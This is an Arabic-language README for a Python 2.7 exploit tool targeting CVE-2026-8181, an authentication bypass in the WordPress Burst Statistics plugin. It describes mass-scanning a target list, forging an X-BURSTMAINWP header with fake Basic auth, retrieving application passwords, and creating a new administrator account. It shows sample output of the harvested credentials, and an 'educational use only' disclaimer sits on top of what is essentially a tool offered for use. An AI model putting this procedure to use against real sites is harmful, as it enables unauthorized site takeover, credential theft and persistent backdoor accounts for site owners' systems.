
CVE-2026-8181: Burst Statistics Auth Bypass → الاستيلاء على REST API وإنشاء حساب مسؤول. Python 2.7. للاستخدام التعليمي فقط.
Python 2.7 أداة استغلال لثغرة إضافة Burst Statistics (CVE-2026-8181) التي تسمح للمهاجمين غير المصادقين بتجاوز مصادقة REST API، واسترجاع كلمات مرور التطبيقات، وإنشاء مستخدمين جدد بصلاحيات مسؤول على مواقع WordPress الضعيفة.
⚠️ إخلاء المسؤولية
هذه الأداة مخصصة لأغراض الاختبار التعليمي واختبار الاختراق المصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدمها فقط على مواقع الويب التي تملكها أو لديك إذن صريح لاختبارها. يمكنك الاطلاع على مزيد من إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!
تؤثر ثغرة CVE-2026-8181 على إضافة Burst Statistics لنظام WordPress (الإصدارات التي تسبق التصحيح). تكمن الثغرة في آلية مصادقة REST API، مما يسمح للمهاجم بـ:
X-BURSTMAINWP مُحضّرة خصيصًا/burst/v1/mainwp-auth/, /wordpress, )/wp/wp-json/wp/v2/users أو إعادة توجيه معرف المؤلفres_login.txt – بيانات اعتماد REST API موجزة ومفصولة بعلامة (|) (سهلة التحليل/الاستيراد)full_res_login.txt – تقرير كامل قابل للقراءة البشرية يتضمن التحقق من الوصول وكلمات مرور التطبيقاتrequestspip install requests
قم بإعداد ملف قائمة الأهداف (نطاق أو عنوان IP واحد في كل سطر، مع أو بدون http:///https://).
مثال targets.txt:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
قم بتشغيل الاستغلال:
python2 CVE-2026-8181.py targets.txt
res_login.txt – بيانات اعتماد REST API (سطر واحد لكل هدف ضعيف)full_res_login.txt – تقرير مفصّل| الوسيطة | الوصف |
|---|---|
list.txt | مسار الملف الذي يحتوي عناوين الأهداف |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – بيانات اعتماد REST API الموجزةكل سطر يتبع هذا التنسيق المفصول بعلامة (|):
target|username|password|email|user_id
مثال:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
هذا التنسيق مثالي من أجل:
cut أو grep أو Excelfull_res_login.txt – التقرير المفصل الكامللكل هدف ضعيف، يضيف السكربت كتلة قابلة للقراءة البشرية:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
ملاحظة: إذا لم تكن نقطة نهاية كلمة مرور التطبيق متاحة أو لم تُرجِع أي رمز، فسيظهر هذا القسم كـ
FAILED.
http:// إذا كانت مفقودة، ويزيل الشرطات المائلة اللاحقة./ و/wordpress و/wp كدلائل أساسية لـ WordPress./wp-json/wp/v2/users أو يستخدم عمليات إعادة التوجيه ?author=N.X-BURSTMAINWP: 1 مع مصادقة Basic باستخدام اسم المستخدم وكلمة مرور وهمية (CVE-2026-8181). إذا أعادت نقطة النهاية /wp-json/wp/v2/users/me?context=edit رمز الحالة 200، يكون الموقع ضعيفًا./wp-json/burst/v1/mainwp-auth لاسترجاع رمز كلمة مرور التطبيق./settings و/plugins و/users.POST /wp-json/wp/v2/users.res_login.txt والتفاصيل الكاملة إلى full_res_login.txt.يمكنك تعديل هذه المتغيرات داخل السكربت:
THREADS – عدد الخيوط المتزامنة (10 افتراضيًا)BASE_PATHS – أدلة فرعية إضافية لـ WordPress للتحقق منهاrequestsهذا المشروع مقدم لأغراض تعليمية فقط. الاستخدام على مسؤوليتك الخاصة.